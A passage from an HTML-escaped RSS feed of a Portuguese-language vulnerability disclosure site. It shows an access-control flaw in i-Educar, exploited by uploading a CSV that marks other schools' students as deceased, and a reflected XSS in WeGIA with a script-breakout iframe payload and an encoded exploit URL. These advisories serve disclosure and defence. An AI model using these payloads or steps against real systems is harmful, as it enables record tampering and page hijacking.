&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/itauan&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/itauan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/itauan&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Itauan Santos&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 17 Mar 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-2015</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-2015/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-2015/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-2015-a-autorização-de-nível-de-função-quebrada-bfla-permite-a-modificação-arbitrária-de-registros-de-alunos-por-meio-da-ferramenta-de-importação-de-status-final&amp;#34;&amp;gt;CVE-2026-2015: A Autorização de Nível de Função Quebrada (BFLA) permite a modificação arbitrária de &amp;lt;code&amp;gt;Registros de Alunos&amp;lt;/code&amp;gt; por meio da ferramenta de &amp;lt;code&amp;gt;Importação de Status Final&amp;lt;/code&amp;gt;.
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA) foi identificada na ferramenta &amp;lt;code&amp;gt;Importação de Status Final&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário autenticado com permissões de nível &amp;lt;code&amp;gt;&amp;#34;Escola&amp;#34;&amp;lt;/code&amp;gt; ignore as restrições funcionais pretendidas e modifique registros acadêmicos pertencentes a qualquer unidade escolar dentro da rede municipal.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-2015-a-autorização-de-nível-de-função-quebrada-bfla-permite-a-modificação-arbitrária-de-registros-de-alunos-por-meio-da-ferramenta-de-importação-de-status-final&amp;#34;&amp;gt;CVE-2026-2015: A Autorização de Nível de Função Quebrada (BFLA) permite a modificação arbitrária de &amp;lt;code&amp;gt;Registros de Alunos&amp;lt;/code&amp;gt; por meio da ferramenta de &amp;lt;code&amp;gt;Importação de Status Final&amp;lt;/code&amp;gt;.
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA) foi identificada na ferramenta &amp;lt;code&amp;gt;Importação de Status Final&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário autenticado com permissões de nível &amp;lt;code&amp;gt;&amp;#34;Escola&amp;#34;&amp;lt;/code&amp;gt; ignore as restrições funcionais pretendidas e modifique registros acadêmicos pertencentes a qualquer unidade escolar dentro da rede municipal.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Componente Vulnerável: &amp;lt;code&amp;gt;Configurações &amp;amp;gt; Ferramentas &amp;amp;gt; Importação de Status Final&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;contexto&amp;#34;&amp;gt;Contexto:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A conta do atacante está estritamente limitada a uma unidade escolar específica (Ensino Fundamental) com permissões de &amp;#34;Escola&amp;#34; de baixo nível. Todas as permissões administrativas ou de edição global estão desativadas.&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;acesso-autorizado&amp;#34;&amp;gt;Acesso Autorizado:
&amp;lt;/h4&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quando um usuário administrativo (com permissões globais ou locais adequadas) acessa o registro de um aluno, o menu suspenso &amp;#34;Status Final&amp;#34; fica visível e totalmente funcional, permitindo atualizações manuais de status.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-5.png&amp;#34;
	width=&amp;#34;397&amp;#34;
	height=&amp;#34;303&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-5_hu_c70c79ad0e6a6e84.png 480w, /p/cve-2026-2015/image-5_hu_8f3ed5f7812ceb8e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;314px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;acesso-não-autorizado-visão-do-atacante&amp;#34;&amp;gt;Acesso Não Autorizado (Visão do Atacante):
&amp;lt;/h4&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quando o atacante tenta editar um aluno de uma unidade escolar diferente por meio da interface padrão, o menu suspenso &amp;#34;Status Final&amp;#34; fica oculto. O sistema identifica corretamente que o usuário não possui autorização para essa função específica no frontend.
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-6.png&amp;#34;
	width=&amp;#34;411&amp;#34;
	height=&amp;#34;158&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-6_hu_5510dcd616bc5d5f.png 480w, /p/cve-2026-2015/image-6_hu_7a6c2b34808b5d5b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O atacante identifica IDs de alunos de outras instituições (por exemplo, IDs 212, 199, 200). Um payload em CSV é preparado para forçar uma mudança de status para &amp;#34;Falecido&amp;#34;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image.png&amp;#34;
	width=&amp;#34;894&amp;#34;
	height=&amp;#34;190&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image_hu_c7c42b10db2b974d.png 480w, /p/cve-2026-2015/image_hu_6d3b4c2322653ac2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;470&amp;#34;
		data-flex-basis=&amp;#34;1129px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-1.png&amp;#34;
	width=&amp;#34;1545&amp;#34;
	height=&amp;#34;529&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-1_hu_6d735bdfad336652.png 480w, /p/cve-2026-2015/image-1_hu_a4d2bd6942b71675.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;292&amp;#34;
		data-flex-basis=&amp;#34;700px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O atacante navega até a ferramenta de Importação de Status Final. Ao fazer o upload do CSV, ele aciona o serviço vulnerável. O backend processa os IDs sem validar a propriedade institucional.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-2.png&amp;#34;
	width=&amp;#34;1006&amp;#34;
	height=&amp;#34;679&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-2_hu_e7355ace98b61b4b.png 480w, /p/cve-2026-2015/image-2_hu_12ff1c22bcc7bc72.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;148&amp;#34;
		data-flex-basis=&amp;#34;355px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A ferramenta reporta sucesso para todos os registros. Uma verificação no perfil do aluno alvo (da unidade não autorizada) confirma que o status foi alterado. Vários alunos foram afetados, comprovando a capacidade de sabotagem em massa.
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-3.png&amp;#34;
	width=&amp;#34;1545&amp;#34;
	height=&amp;#34;858&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-3_hu_be60c479f60e4c9d.png 480w, /p/cve-2026-2015/image-3_hu_32d0a507a865efc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;432px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-4.png&amp;#34;
	width=&amp;#34;1548&amp;#34;
	height=&amp;#34;863&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-4_hu_b90d49652e2eba69.png 480w, /p/cve-2026-2015/image-4_hu_d09d377b734095d7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;179&amp;#34;
		data-flex-basis=&amp;#34;430px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta é uma vulnerabilidade de Autorização em Nível de Função Quebrada (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Adulteração de dados acadêmicos sem autorização.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda da integridade dos dados em registros escolares.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Potencial dano legal e à reputação de instituições de ensino.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 06 Feb 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-23722</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-23722/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-23722/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-23722-cross-site-scripting-xss-reflected-permite-a-execução-de-código-arbitrário-e-a-alteração-da-interface-do-usuário&amp;#34;&amp;gt;CVE-2026-23722: Cross-Site Scripting (XSS) Reflected permite a execução de código arbitrário e a alteração da interface do usuário.
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi descoberta no sistema WeGIA, especificamente no arquivo &amp;lt;code&amp;gt;html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;/html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://js-dos.com/games/doom.exe.html&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;style&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-url&amp;#34;&amp;gt;Exemplo de URL:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20to p% 3A0% 3B% 20esquerda%3A0%3B%20inferior%3A0%3B%20direita%3A0%3B%20largura%3A100%25%3B%20altura%3A100%25%3B%20borda%3A nenhum% 3B% 20margem% 3A0% 3B% 20preenchimento% 3A0%3B% 20overflow% 3Ahidden% 3B% 20z-index% 3A999999% 3B% 22% 3E% 3C% 2Fiframe% 3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O payload sai do contexto existente (provavelmente uma atribuição de variável JavaScript) usando a tag &amp;lt;code&amp;gt;script&amp;lt;/code&amp;gt; e injeta um iframe externo que cobre toda a área visível.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-23722-cross-site-scripting-xss-reflected-permite-a-execução-de-código-arbitrário-e-a-alteração-da-interface-do-usuário&amp;#34;&amp;gt;CVE-2026-23722: Cross-Site Scripting (XSS) Reflected permite a execução de código arbitrário e a alteração da interface do usuário.
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido foi descoberta no sistema WeGIA, especificamente no arquivo &amp;lt;code&amp;gt;html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;/html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://js-dos.com/games/doom.exe.html&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;style&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
